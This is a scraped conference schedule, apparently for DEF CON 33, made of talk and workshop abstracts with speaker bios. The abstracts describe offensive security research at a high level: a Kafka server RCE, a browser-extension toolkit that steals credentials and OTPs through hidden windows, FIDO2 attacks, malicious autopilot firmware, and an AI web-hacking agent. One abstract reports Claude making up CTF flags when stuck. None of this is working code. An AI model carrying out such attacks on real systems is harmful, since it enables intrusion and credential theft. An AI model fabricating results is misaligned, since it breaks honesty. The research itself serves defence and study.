Speakers: Ruchira Pokhriyal, Harini Ramprasad
Ruchira is currently working as a Senior Threat Detection and Response Engineer at Lending Club.
SpeakerBio: Harini Ramprasad, Security Engineer at Snap
Harini is currently working as a Security Engineer at Snap.
Ever wondered what happens after you hit "submit" on a bug bounty report? At T-Mobile, each submission kicks off a behind-the-scenes journey that spans teams, tools, and time zones. In this talk, we’ll walk through the lifecycle of a bug bounty submission—from Bugcrowd’s triage desk to our internal security workflows—and show why not every finding is considered equal from a business risk perspective.
SpeakerBio: Elisa Gangemi, Senior Cybersecurity Engineer at T-Mobile
Elisa Gangemi is a Senior Cybersecurity Engineer on the OffSec Team at T-Mobile, where they manage the Penetration Testing Pipeline and contribute to the company’s Bug Bounty Program. With prior experience in offensive and product security at startups, Elisa helped launch vulnerability management programs, including bug bounty initiatives and security tooling. They began their technology career as a QA tester, then transitioned into InfoSec at Akamai Technologies, working on technical program management and security research. Elisa holds the GIAC GWAPT certification and serves on the GIAC Advisory Board. They’ve enjoyed learning hacking techniques and have participated in a U.S. team that twice placed in the top four at NorthSec’s CTF in Montreal. DEF CON 33 marks their first year attending and speaking.
Over the past few months, we've thrown Claude into the digital trenches of multiple cybersecurity competitions—from defending vulnerable networks at CCDC to cracking challenges in PicoCTF and HackTheBox. In this talk, I'll take you through our journey deploying an AI assistant against human red teams and live CTF challenges. I'll show you Claude's unexpected wins (landing in the top 3% globally in PicoCTF and successfully fending off red team attacks at CCDC) alongside its entertaining fails (devolving into security philosophy when overwhelmed, making up flags for PlaidCTF when stuck).
Drawing on these results, I'll break down the technical challenges we conquered, from building specialized tooling harnesses to keeping Claude coherent during 16+ hour competitions. This presentation will demonstrate how competitive environments reveal both the impressive capabilities and amusing limitations of today's AI systems when operating in adversarial scenarios. Join me to see what happens when an assistant trained to be helpful gets dropped into the dynamic world of CTFs and defense competitions—and what this teaches us about AI's true potential in cybersecurity.
SpeakerBio: Keane Lucas, Member of Technical Staff at Anthropic
Keane is a researcher on Anthropic's Frontier Red Team focused on stress-testing AI model cybersecurity capabilities. Before joining Anthropic, Keane served as a Cyberspace Operations Officer in the US Air Force and earned his PhD at Carnegie Mellon, where his research focused on applying machine learning to malware detection.
Apache Kafka is an open-source distributed event streaming platform. At the heart of Kafka lies the Broker, which acts as the central server node in a Kafka cluster. Brokers are responsible for storing streams of data and managing the flow of messages between producers and consumers. The Kafka Server we often refer to is essentially the Kafka Broker.
While Kafka’s core system handles data streams well, its real strength comes from its growing ecosystem. The components in that ecosystem greatly expand its abilities: Confluent ksqlDB transforms raw streams into queryable tables for real-time analytics; Schema Registry standardizes data formats across microservices; and so on.
However, behind these rich components lie hidden security threats. Prior research has revealed Remote Code Execution (RCE) vulnerabilities in the Kafka Client, yet notably absent were any exploitable RCE vulnerabilities in the Kafka Server — until now. In this work, we present the first-ever RCE vulnerability affecting the Kafka Server itself. We also used similar techniques to attack other components in the Kafka ecosystem, and these vulnerabilities can affect the cloud service providers themselves. What's more, since Kafka users remain unaware of this risk, thousands of Kafka servers are currently exposed to this RCE vulnerability.
Speakers: Ji'an "azraelxuemo" Zhou, Ying Zhu, ZiYang "lz2y" Li
Ji'an Zhou is a Security Engineer at Alibaba Cloud. He focuses on Java security and cloud-native security, and his work has helped many high-profile vendors improve their products' security, including Google, Amazon, Cloudera, IBM, Microsoft, and Oracle. He has previously spoken at Black Hat, Zer0Con, and Off-by-One Con.
SpeakerBio: Ying Zhu
Ying Zhu is a Security Engineer at Alibaba Cloud. He is interested in web application security, especially Java application security. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.
SpeakerBio: ZiYang "lz2y" Li
Ziyang Li is a Security Engineer at Alibaba Cloud. He is focused on Java security and security products. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.
Want to give vishing a shot? Step into our soundproof booth, grab a mystery target with its number and three challenge tiers, and see if you can nail easy, medium, and hard objectives - first come, first served!
Copycat is a browser extension-based red team toolkit for simulating web-based identity attacks. This tool simulates ten web-based identity attacks through a single browser extension with minimal permissions, operating primarily through hidden windows that execute attacks without user awareness. With Copycat, red teams can simulate complex attack scenarios including silent Gmail and LinkedIn hijacking, credential theft through login and OTP stealing, login page redirection, autofill extraction from enterprise applications, and multiple OAuth manipulation techniques. Copycat runs entirely in-browser with no special hardware requirements. Red teams can use Copycat to demonstrate attack vectors that bypass EDRs, SASE, and other traditional security controls, as these techniques operate within legitimate authenticated sessions rather than breaking them. The tool is fully modifiable, with each module designed for customization to target different services or authentication flows. Source code and documentation will be available for security researchers to extend and improve the framework. Special mention to Pankaj Sharma, Tejeswara S. Reddy, and Arpit Gupta for their contributions in building this toolkit!
Speakers: Dakshitaa Babu, Shourya Pratap Singh
Dakshitaa is a security researcher and product evangelist at SquareX, where she leads the security research team. A self-taught cybersecurity researcher mentored by offensive security veteran Vivek Ramachandran, she specializes in web attacks — malicious websites, files, scripts, and extensions capable of bypassing traditional security solutions. Her research directly fuels SquareX's product innovation, ensuring it stays ahead of evolving threats. As a product evangelist, she is the principal author of SquareX's technical collateral. She has contributed to bleeding-edge browser security research presented at BSides SF, Adversary Village, Recon Village, and the DEF CON main stage. Her work on email security bypasses, breaking secure web gateways, MV3 extension vulnerabilities, browser syncjacking, polymorphic extensions, and browser-native ransomware has been covered by leading media outlets, including Forbes, TechRadar, Mashable, The Register, Bleeping Computer, and CyberNews.
SpeakerBio: Shourya Pratap Singh
Shourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEF CON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.
There's been remarkably little discussion about how mobile forensic tools fare against adversarially modified environments, particularly in terms of forensic reliability. Tools (and investigators) often assume that target devices function as expected, with minimal scrutiny of whether that assumption holds. Our research demonstrates otherwise - sophisticated anti-forensic techniques placed within Android devices can silently compromise evidence, placing longstanding investigative and extraction methodologies at risk.
Our research addresses a blind spot in Android logical extraction workflows - namely, the assumption that once mobile forensic software overcomes the hurdle of device access, the extraction will proceed correctly. While forensic software excels at getting a foot in the door, in our tests it offers little against stealthy, second-layer countermeasures that can silently manipulate or destroy data post-access.
Speakers: Weihan Goh, Joseph Lim, Isaac Soon
Dr Weihan Goh is an Associate Professor at the Singapore Institute of Technology (SIT). His research interests include digital forensics, anti-forensics, security testing, as well as technologies for cybersecurity education such as cyber ranges, CTF / CDX, remote proctoring, and anti-fraud / anti-cheat systems. Beyond teaching and research, Dr Goh participates in capture-the-flag exercises, going by the CTF handle 'icebear'.
SpeakerBio: Joseph Lim, Final-year Information Security Student, Singapore Institute of Technology
Joseph Lim is an Information Security undergraduate at the Singapore Institute of Technology, with a diploma in Infocomm Security Management from Singapore Polytechnic. With a strong foundation in cybersecurity, he is particularly interested in mobile security and digital forensics. Joseph has also previously presented research on mobile malware at the 14th ACM Conference on Data and Application Security and Privacy (2024).
SpeakerBio: Isaac Soon, Final-year Information Security Student, Singapore Institute of Technology
Soon Leung Isaac is currently pursuing a degree in Information and Communication Technology, specializing in Information Security, at the Singapore Institute of Technology. Previously, he served as a SOC analyst in the Singapore Armed Forces for two years, where he was responsible for safeguarding Singapore's military network. His main areas of research include offensive security and mobile security.
Pseudo-random number generators are often overlooked yet core features of our computational experience. From research and processes irrelevant to security (e.g., Monte Carlo simulations) to essential security functionality like secret generation, random number generation plays a significant part in our ability to use the modern internet. In turn, PRNGs have a unique history, threat model, and set of applications. We will discuss the history of pseudo-random number generation, the types of random number generators, where they are supposed to be used, and how to break them, when relevant. Additionally, we will discuss the future direction of random number generation in light of preparation for the advent of large-scale quantum computing.
SpeakerBio: 1nfocalypse
1nfocalypse is a software engineer with an interest in coding theory, cryptography, and numerical analysis. He is currently working on portions of libstdc++-v3 and enjoys implementing/tinkering with cryptographic primitives and standards.
AI 🤖 is being discussed in pretty much all presentations out there. So, what is different about this session? This is a completely hands-on workshop where we will explore cutting edge agentic frameworks through the creation of an AI agent designed to hack web applications 🌐. You will learn how to develop a modular AI agent capable of performing reconnaissance, vulnerability scanning, and exploiting a web application. We will cover an overview of current AI techniques applicable to red team operations through live demonstrations and interactive exercises.
🚀 Join Omar Santos at DEF CON's Red Team Village to explore how the fusion of AI and red teaming not only redefines the landscape of cyber offensive operations, but also sets the stage for pioneering defensive countermeasures.
🛡️ This workshop promises to equip you with both the knowledge and practical skills to leverage AI in red team operations.
SpeakerBio: Omar Santos
Omar Santos is an active member of the security community, where he leads several industry-wide initiatives and standards bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition for Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.
Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.
Buildings are largely overlooked when it comes to cyber security. The onus is typically placed on physically securing the building and the people inside it. What most gloss over is the fact that industrial control systems run these buildings, and without them, everyday functions become unavailable and downright dangerous. The dangers are growing as buildings become more "connected" and require internet access to operate (e.g., sustainability and IoT). Malicious use of engineering protocols (Modbus, Fox, BACnet) and targeted attacks against BAS systems are growing (e.g., KNXLock).
Environments run the gamut from overly secure, to the point of crippling operations, all the way to leaving RDP to critical systems exposed with no logging or MFA. There is no easy fix; properties must invest in technology and people to create a defensible environment. This presentation will show how cyber security can be enabled in a way that fits the business's operations with minimal disruption.
Building types are not constrained to only office space. Properties come in all varieties from warehouses and manufacturing spaces to data centers and shopping malls. All of this needs to be taken into account when assessing the environment and recommending tools and procedures. This talk will cover common architectures seen, typical control systems found in buildings (BMS, FLS, elevator, lighting, power...), reproducible steps to help companies/users understand their vulnerabilities and how we, as an industry, move forward.
For the most part, these are not technical problems, but a literal gap that needs to be addressed directly by budgetary and policy controls. The industry is pushing for cybersecurity budgeting, standards and visibility for properties, which are largely ignored or misunderstood by owners and operators. This is a solvable problem and I want attendees to feel empowered to ask tough questions and be prepared to have an educated conversation about the risks and not use fear mongering or scare tactics to get cybersecurity put in place.
SpeakerBio: Thomas Pope, JLL
Thomas Pope is the Head of Property Cybersecurity at Jones Lang LaSalle (JLL). His team assists customers and internal teams with securing control systems at their properties and with accomplishing cybersecurity at scale with regard to building operations. Previous stints include leading incident response engagements at Cisco Talos as an Incident Commander, Adversary Hunter at Dragos searching for ICS-specific adversaries, and standing up multiple cybersecurity programs at Duke Energy.
Multiple agencies have attempted to regulate cryptocurrencies through various means. This workshop will begin with a short presentation about the different organizations with an interest in regulating cryptocurrency (SEC, CFTC, IRS, and DOJ) and provide examples of enforcement actions. Next, participants will break out into discussion groups to consider the pros and cons of regulation by enforcement. Then, participants will be given a hypothetical cryptocurrency and be assigned a role either as a 'regulator' or as a 'developer.' The participants will engage in a settlement type discussion to determine if the cryptocurrency should be regulated under one agency, multiple agencies, or not at all.
Speakers: Veronika, Chelsea Button
Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.
Cryptocurrency nodes validate and relay transactions across the network. Like servers in a traditional financial system, nodes store a copy of the blockchain and enforce the network's rules. Many of us want to run our own node for reasons of security, convenience, and independence from other people's node configurations. Come to understand nodes, build your own, and explore configurations to test wallet applications on your new cryptocurrency node.
Speakers: Diego "rehrar" Salazar, Dan
Diego 'rehrar' Salazar has been around the FOSS and cryptocurrency communities for eight years. He owns and runs Cypher Stack, a company that performs novel research and makes contributions to various FOSS projects. He has organized and managed several villages at DEF CON, c3, and more.
SpeakerBio: Dan
Reporting on the state of affairs in cryptocurrency trends, Nick and Elaine give insight from their esteemed positions in industry and academia. Additionally, we get a status report of workshops, showcases, and programs in the Cryptocurrency areas of DEF CON. We announce the teams competing in the Cryptocurrency Cyber Challenge, and give an overview of what's available in the vending area. Meet the organizers of years of cryptocurrency content at DEF CON and bring your questions to the Community Stage!
Speakers: Chelsea Button, Nick "c7five" Percoco, Elaine Shi
Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.
SpeakerBio: Nick "c7five" Percoco, CSO at Kraken
Nick Percoco is the Chief Security Officer at Kraken, where he spearheads the frameworks and protocols that ensure a secure and seamless trading experience for clients. A recognized leader in the security and hacker community, Nick brings nearly 30 years of expertise in cybersecurity and technology, shaping the industry's approach to threat defense and risk mitigation. A dedicated contributor to the security community, he founded THOTCON, Chicago’s premier non-profit hacking conference, and has been a contributor to secure infrastructure and network design at DEF CON, the world’s largest hacking conference, since 2017. An accomplished speaker and researcher, Nick has presented groundbreaking work on cryptocurrency security, targeted malware, mobile security (iOS & Android), and IoT vulnerabilities at leading global forums, including Black Hat, RSA Conference, DEF CON, CfC St. Moritz, and SXSW.
SpeakerBio: Elaine Shi, Professor at Carnegie Mellon University
Elaine Shi is a Packard Fellow, Sloan Fellow, ACM Fellow, and IACR Fellow. A Professor with a joint appointment in CSD and ECE at Carnegie Mellon University, Elaine is also an Adjunct Professor of Computer Science at the University of Maryland. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. Elaine is a co-founder of Oblivious Labs, Inc. Her research on Oblivious RAM and differentially private algorithms has been adopted by Signal, Meta, and Google.
In 2022 a framework and tool for cryptographic attacks called Cryptosploit was introduced. In this workshop we will demo the capabilities and the underlying philosophy as well as new commands. This will include the flexibility of mixing and matching attack code with oracles and new commands to import and export cryptographic keys. In particular, we will demonstrate how after a successful attack on a public key, we will be able to export the private key corresponding to the certificate. The presentation will conclude with thoughts on improvements.
SpeakerBio: Matt Cheung
Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on the implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority, and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's Crypto I course offered on Coursera and the Matasano/cryptopals challenges. Since then he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.
FIDO2 is the de-facto standard for passwordless and 2FA authentication. FIDO2 relies on the Client-to-Authenticator Protocol (CTAP) to secure communications between clients (e.g., web browsers) and authenticators (e.g., USB dongles). In this talk, we perform a security assessment of CTAP and its Authenticator API. This API is a critical protocol-level attack surface that handles credentials and authenticator settings.
We investigate the standard FIDO2 setup (credentials stored by the relying party) and the most secure setup, where credentials are stored on the authenticator, protected from data breaches. We find that FIDO2 security mechanisms still rely on phishable mechanisms (i.e., PIN) and unclear security boundaries (e.g., trusting unauthenticated clients).
We introduce eleven CTRAPS attacks grouped into two novel classes: Client Impersonation and API Confusion. These attacks exploit CTAP vulnerabilities to wipe credentials, perform unauthorized factory resets, and track users. Our open-source toolkit implements the attacks on two Android apps, an Electron app, and a Proxmark3 script, supporting the USB HID and NFC transports. In our demos, we show how to use our CTRAPS toolkit to exploit popular authenticators, like YubiKeys, and relying parties, like Microsoft and Apple.
Marco Casagrande is a postdoctoral researcher in cybersecurity at the KTH Royal Institute of Technology (Sweden). He specializes in the security of real-world smart devices, including fitness trackers, FIDO authenticators, and electric scooters.
SpeakerBio: Daniele Antonioli
Daniele Antonioli is an Assistant Professor at EURECOM in the software and system security (S3) group. He researches and teaches applied system security and privacy, with an emphasis on wireless communication, such as Bluetooth and Wi-Fi, embedded systems, such as cars and fitness trackers, mobile systems, such as smartphones, and cyber-physical systems, such as industrial control systems.
Contestants will access a virtual environment with dynamic challenges that need to be exploited and contested. Individuals gain points for each system they are able to plant and maintain their flag on.
Redteam Rumble was piloted with a single competition at DEF CON 32 with great success, and we're thrilled to bring it back for DEF CON 33! This event is designed with more advanced competitors in mind, and is not for the faint of heart!
Teams will defend their "Castle," a virtual environment comprising several systems and services (both Windows and Linux systems may be included). Each castle has exposed services and exploitable vulnerabilities, along with a few hidden extras.
This event is a free-for-all between 4 teams competing against each other to gain points by controlling services and flags within their own and each opponent's infrastructure. That means your team will have to balance defending your own systems while simultaneously hunting for vulnerabilities that can be exploited to control other teams' systems.
Each event will consist of 4 teams competing in a free-for-all for 2 hours. Pre-registration is required.
Strategic Operations will feature two teams going head to head in a classic offense vs. defense battle. The defensive team gains points by successfully providing mission-critical services during a short scoring window, while the offensive team gains points by performing targeted service interruptions and data manipulation.
Each event will consist of 2 teams competing in an attacker vs. defender battle for anywhere from 30 to 90 minutes. Pre-registration is recommended, but not required.
One of our goals with Strategic Operations is to provide a fun and engaging experience for attendees who discover us on the competition floor, without requiring prior registration. We will do our best to accommodate walk-in participants when possible!
DEF CON's first-ever race: Expect to hear hardcore, happy hardcore, breakcore, speedcore, hardstyle. Bring your phat pants, kandi bracelets, and nine inch nails (on finger) to this once in a lifetime rave.
For all people who want to hang out and celebrate the lives and deaths of people influential to the hacker community. Attendees are encouraged to dress to kill in Day of the Dead attire or any attire that includes dead heroes. Music will be provided by CURZES and special guest DJs.
Everyone is welcome to join us and celebrate the dead!
Community is essential and so is continual learning. Reading and discussing books can greatly impact an individual’s access to and sense of community and knowledge. This DEF CON book discussion will be an accessible group aiming to build community and share learnings, all in a quieter setting. Come join us in person and discuss what you’ve been reading. This DC Book Club is not locked to a region and we're around all year on Discord, where we discuss books and other topics. This meetup is for those who love books and escaping to the cyberpunk, sci-fi worlds that inspire DEF CON and our future. Come join us!
DCNextGen event for youth 8-18 only. The DC NextGen youth party is the perfect place to loosen up and have fun with other kids and teens your age! There is no better time to hang out and chat with the new friends you've made here. All while enjoying fun games and cyber themed activities. Are you ready to build a team and hack the planet?
Future of DDoS Attacks and Prevention
SpeakerBio: Andrew Cockburn, Netscout
Modern software protectors increasingly rely on complex, often nested, virtualization techniques (VMProtect, Themida, custom solutions) which significantly hinder static and dynamic analysis. This talk introduces DragonSlayer, an automated framework combining symbolic execution with fine-grained dynamic taint tracking to systematically lift obfuscated bytecode from these protectors. Our approach precisely identifies VM handlers, recovers original instruction semantics, automatically unpacks multiple virtualization layers, and reconstructs analyzable representations of protected code. We demonstrate DragonSlayer's effectiveness against the latest commercial VM protectors and custom obfuscation solutions, significantly reducing analysis time from weeks to hours. This presentation includes technical deep-dives into our methodology, real-world case studies, and a demonstration of our tooling that helps reverse engineers slay the virtualization dragon.
Dr. Agostino "van1sh" Panico is a seasoned offensive security expert with over 15 years of experience specializing in advanced red teaming, exploit development, product security testing, and deception tactics. He is one of the few hundred globally to hold the prestigious GSE (GIAC Security Expert) certification. Driven by a passion for uncovering vulnerabilities, Agostino actively contributes to the security community as an organizer for BSides Italy, fostering collaboration and innovation.
We demonstrate a vulnerability in a commonly-used autopilot computer that allows unsigned firmware to be pushed through trusted update channels such as SD cards and NMEA 2000 networked chart plotters without authentication or cryptographic validation. We show how a malicious ‘.swup’ file can be crafted and accepted by the system to gain persistent code execution, enabling arbitrary CAN bus injection on marine control networks. The attack chain, reminiscent of removable-media-style delivery in air-gapped systems, demonstrates how firmware-level control in marine environments can be leveraged to disrupt navigation subsystems. We will walk through firmware extraction, reverse engineering of firmware and CAN subroutines, firmware repackaging, and live effects on NMEA 2000 networks. No physical access to the autopilot is needed; the attack leverages trusted firmware delivery via the chart plotter over NMEA 2000.
Speakers: Carson Green, Rik Chatterjee
Carson Green is a graduate research assistant in systems engineering at Colorado State University, with a bachelor’s degree in electrical engineering. He enjoys designing and debugging PCBs, researching vulnerabilities in cyber-physical systems, and can often be found playing the banjo.
SpeakerBio: Rik Chatterjee, Colorado State University
Rik is a PhD student at Colorado State University exploring the tangled edge of embedded systems and cybersecurity. His research focuses on real-world vulnerabilities in automotive and industrial controllers, from reverse engineering to network-protocol-level vulnerabilities. He’s previously shared his work at DEF CON and NDSS. When he’s not pulling apart PCBs, you’ll find him elbow-deep in his vegetable garden, proving that both firmware and tomatoes need rooting.
Fuzzing is a technique for identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry. Today fuzzing can be utilized in various ways that can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques that provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will cover a detailed overview of fuzzing and how it can help professionals uncover security vulnerabilities, with a hands-on approach through a focus on labs.
Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern software has a huge codebase and may contain vulnerabilities; manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training introduces the concept of fuzzing and vulnerability discovery in software across multiple platforms, such as Linux and Windows, and triage analysis for those vulnerabilities.
Speakers: Zubin Devnani, Dhiraj Mishra
Zubin Devnani is a red teamer by trade who has identified multiple vulnerabilities in commonly used software. He is a trainer at Black Hat and has delivered multiple workshops, including at PHDays and Hacktivity. He utilizes his fuzzing skills in his day-to-day trade to identify new ways of breaking into enterprises! He blogs at devtty0.io and tweets as @p1ngfl0yd.
SpeakerBio: Dhiraj Mishra
Dhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers, and an open-source contributor. He is a trainer at Black Hat, BruCON and 44CON and has presented at conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris and HITB. In his free time, he blogs at www.inputzero.io and www.fuzzing.at and tweets as @RandomDhiraj.
In this hands-on workshop you’ll move beyond the theory of network fingerprinting and actually use fingerprints in practice at both the TCP and TLS layers. Working in live lab environments, you will work with muonfp, p0f, ja3, ja3n and ja4.
Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO). A true cybersecurity enthusiast, Vlad’s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.
Performing analysis of fake images and videos can be challenging considering the plethora of techniques that can be used to create a deepfake. In this session, we'll explore methods for identifying fake images and videos whether created by AI, photoshopped, or GAN-generated media. We'll then use this for the basis of a live demonstration walking through methods of exposing signs of alteration or AI generation using more than a dozen techniques to expose these forgeries. We'll also highlight a free GPT tool for performing your own analysis. Finally, we'll provide additional resources and thoughts for the future of deepfake detection.
SpeakerBio: Mike Raggo, Security Researcher at SilentSignals
Michael T. Raggo has over 30 years of security research experience. During this time, he has uncovered and ethically disclosed vulnerabilities in products from Samsung, Check Point, and Netgear. Michael is the author of “Mobile Data Loss: Threats & Countermeasures” and “Data Hiding” for Syngress. He is also a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, and SANS. He was also awarded the Pentagon’s Certificate of Appreciation.
Held every year since DEF CON 19 in 2011 (R.I.P. Riviera), (Except during that COVID thing - but we are not going to talk about that COVID thing), the DEF CON (unofficial) Beard and Mustache Contest highlights the intersection of facial hair and hacker culture.
For 2025 there will be four categories for the competition; you may enter only one:
Full beard: Self-explanatory, for the truly bearded.
Partial Beard: For those sporting Van Dykes, Goatees, Mutton Chops, and other partial beard styles.
Mustache only: Judging on the mustache only, even if bearded. Bring your Handlebars, Fu Manchus, or whatever adorns your upper lip.
Freestyle: Anything goes, including fake and creatively adorned beards. Creative women often do well in the Freestyle category.
Real or Fake facial hair as described above.
Explores how DCGs extend the DEF CON ethos year-round. Shares practical stories of how local group POCs foster community. Encourages attendees to connect with their local group or form their own group in the absence of a DCG.
Speakers: Adam915, Jayson E Street, Alethe Denis
Adam915: DEF CON Groups Global Coordinator
SpeakerBio: Jayson E Street, DCG Dept
DEF CON Groups Global Ambassador
SpeakerBio: Alethe Denis, DCG Dept
DEF CON Groups Dept 2nd Lead
Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.
For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs, swag drops and social meetups planned throughout the day and night as well!
Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.
This workshop is designed to give students the skills they need to identify and defeat common evasion techniques used by malware. It’s broken up into three hands-on modules where students will work with a range of open-source (or otherwise free) tools to dig into malicious code, examine different evasion techniques, and learn how to circumvent them to better understand how the malware operates. We’ll be using a mix of instructor-created malware samples—with full source code provided so students can analyze both the binary and the code side-by-side—and real-world samples found in the wild. By the end of the workshop, students will walk away with several malware samples, pages of code to keep digging into on their own, and a solid toolkit of techniques for breaking through typical anti-analysis and evasion tricks used in modern malware.
Speakers: Kyle "d4rksystem" Cucci, Randy Pargman
Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
SpeakerBio: Randy Pargman, Director, Threat Detection @ Proofpoint
Randy leads threat detection and engineering teams at Proofpoint, using custom dynamic sandbox systems to detect evasive malware and phishing threats that target customers around the world. He previously led threat hunting and endpoint detection engineering at Binary Defense, and investigated botnets and other cyber criminal activities as a member of the FBI Cyber Action Team and Seattle Cyber Task Force. Randy currently volunteers as a digital forensic analyst with The DFIR Report, and organizes DEATHCon, a global conference for Detection Engineering and Threat Hunting workshops.
This session will introduce the strategy of designing and deploying deception strategies across ICS environments, by leveraging and operationalizing the Mitre Engage adversarial framework. This presentation will discuss the complexities related to deploying deception within ICS environments, and how to design a deception strategy geared towards the adversaries targeting your environment. A real-world case study, focusing on APT44, will demonstrate how to implement a deception strategy for Critical Infrastructure organisations.
SpeakerBio: Brent Muir, Google
Brent has over 18 years of experience working in the cybersecurity industry. He spent 12 years working in the Australian government sector, including law enforcement agencies, leading national cyber teams. Following his government work, Brent led the global digital forensics and incident response team for a Fortune 500 bank. His expertise has led him to work directly with C-suite and crisis management teams, handling large-scale cyber incidents, including APT-linked cyber espionage campaigns. In addition to the government and financial sectors, Brent has extensive experience working in operational technology industries, including telecommunications and energy providers.
Learn how to build a state-of-the-art quantum sensor, no physics PhD necessary!
Quantum Technology may sound like a faraway ultra-neon cyber fever dream, and in the case of quantum computing it may be some time before we’re swapping QPUs on our laptops… But Quantum Sensing is here, and we felt the time was about right to break open this technology for all.
We designed and are releasing the first ever fully open source, hackable quantum sensor. Utilising common off the shelf parts, and a sample of Nitrogen-Vacancy Centre Diamond, we will be able to measure magnetic fields with light. We will show you how to build your own device, what tech is required, and how to get a signal from the diamond. We’ll discuss some of the use cases of these sensors, from medtech to defeating GPS jamming. Then we’ll show you how to hack with it, taking the first steps to using these sensors to infer the behaviour of a chip via magnetometry. #QuantumHackers
This talk is the main demonstration of this year’s Quantum Village Badge - an actual quantum sensor released for the International Year of Quantum. Whilst others will make you think that you need advanced degrees and an expensive lab, we’ll be building quantum sensors in our garages and pushing the limits of this brand new technology; Access All Atoms!
Mark is a mathematician and Quantum Hacker. Working at the bleeding edge of technology for two decades, he has presented on an array of topics stemming from his work on quantum information, machine learning, cryptography and cybersecurity data science. He has presented at major conferences around the world and his work was recently nominated for Innovation of the Year at the SANS Difference Makers Awards. Mark co-founded Quantum Village.
SpeakerBio: Victoria "V__Wave" Kumaran
Victoria has been hacking her way through tech over the years, making her first software tool aged 8. Victoria has a background in product design, has paid her dues in finance, has run startups using machine learning for cybersecurity & malware analysis and was an Entrepreneurial Lead on the NSF I-Corps Program. She studied art and design at Central Saint Martins and co-founded Quantum Village.
"Hospitals and trauma centers face critical delays in triage, patient monitoring, and shift handoffs—leading to avoidable medical errors, increased wait times, and compromised patient safety. What if AI-powered triage, biometrics, and AI-driven simulation labs could change that? This talk explores how biometric AI, smart bedside displays, digital handoff systems, and AI physiology simulations can enhance emergency care, reduce human error, and revolutionize medical training. Key Innovations We’ll Unpack: 1. AI-Facial Recognition: Upon entry to the hospital/facility, AI-powered sensors take a real-time picture of each patient as they walk/check into the ED and sync the biometric picture with their Medical Record Number (MRN) patient chart. 2. AI-Powered Biometric Triage: AI sensors continue to scan patients in the waiting room, analyzing vital signs (HR, respiratory rate, O2 sat, temp), non-verbal distress like bleeding (trauma), pain based on facial droop (Stroke), chest pain or shortness of breath (Heart Attack), syncope, labor/delivery, and grimacing (pain), and factor all these into the Emergency Severity Index (ESI) algorithm for a real-time comprehensive display to triage staff for their review. 3. Digital Handoff Reporting: Automated shift changes summaries ensure that critical patient data like medical and surgical history, labs, vital trends, pending orders, isolation precautions, and risk factors are not lost between clinicians. It also reduces paper waste, redundancy, and inefficiencies like report duration. 4. Digital Smart Room Display (i.e. TV): Like at a nice hotel room, your patient room tv would provide you with a personalized 